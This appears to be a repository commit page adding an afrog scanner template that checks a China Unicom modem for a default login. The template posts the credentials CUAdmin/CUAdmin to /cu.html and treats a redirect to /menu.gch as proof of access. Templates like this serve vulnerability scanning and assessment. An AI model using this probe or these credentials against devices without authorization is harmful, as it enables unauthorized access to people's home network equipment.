Projects STRLCPY afrog Commits 14667f36
🤬
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/login/default-pwd/chinaunicom-default-login.yaml
     1 +id: chinaunicom-default-login
     2 + 
     3 +info:
     4 + name: China Unicom Modem Default Login
     5 + author: princechaddha
     6 + severity: high
     7 + description: Default login credentials were discovered for a China Unicom modem.
     8 + 
     9 +rules:
     10 + r0:
     11 + request:
     12 + method: POST
     13 + path: /cu.html
     14 + body: |
     15 + frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
     16 + expression: response.status == 302 && response.headers["location"].icontains("/menu.gch")
     17 +expression: r0()
Please wait...
Page is in error, reload to recover